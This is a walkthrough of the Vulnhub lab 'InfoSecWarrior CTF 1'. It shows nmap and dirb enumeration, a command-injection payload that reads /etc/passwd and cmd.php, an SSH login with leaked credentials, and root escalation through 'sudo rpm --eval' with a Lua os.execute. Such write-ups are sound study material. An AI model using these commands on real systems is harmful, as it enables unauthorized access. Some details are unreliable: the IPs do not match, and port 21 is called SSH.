InfoSecWarrior CTF 1 Walkthrough

InfoSecWarrior CTF 1 Walkthrough Vulnhub | InfoSecWarrior CTF 1 Writeup Vulnhub

Welcome to yet another CTF challenge from Vishal Biswas, called InfoSecWarrior CTF 1 which is available online on vulnhub if you want to download the machine link is here

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.64.123

netdiscover

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -A 192.168.43.123

With the help above command, we were able to identify open ports and services running across those ports. Majorly we take a look at port 80 for HTTP, 21 for SSH.

Enumeration

Thus, we navigate to a web browser and browse the target IP in the URL and we see apache 2 Test page

http://192.168.43.123

We’re also trying to list web directories via directory brute force attack, using dirb

dirb http://192.168.43.123/

and we found many directories I open the directory one by one first I open the WordPress directory and we see a database connection error

http://192.168.43.123/wordpress/index.php

i open sitemap.xml url and we see the single sitemap url

http://192.168.43.123/sitemap.xml

and we found another web page in sitemap after enumeration the URL I found command injection script cmd.php but it is hidden

now right-click the page and click the inspect element and delete the hidden node

http://192.168.43.123/index.html

After delete the hidden node we can see command place holder I execute the echo command and change the request GET to post

and we see command injection is working this page

http://192.168.43.123/cmd.php

again follow the same step capture the request in burp suite and send the request repeater

Reading Passwd File using Burp-suite
AI=cat /etc/passwd

I open the cmd.php file using cat command and we found a user password isw0 as shown in the image file

AI=cat cmd.php

I try to login this credential in ssh and we successfull login and we got a shell isw0 user i ran the id command to identified the current user

  • username: isw0
  • password: 123456789blabla
ssh isw0@192.168.43.123
id

I ran the sudo -l command and we see the many binary files in sudoers files use without root password

sudo -l

Privilege Escalation

and that’s what we want now by using the find trick described in the gtfobins I run thes command

sudo rpm --eval '%{lua:os.execute("id")}'
sudo rpm --eval '%{lua:os.execute("/bin/bash")}'
cd /root

and we got root shell I move on the root directory and I found our root flag.txt

ls
cat flag.txt
My Tomcat Host Vulnhub Walkthrough link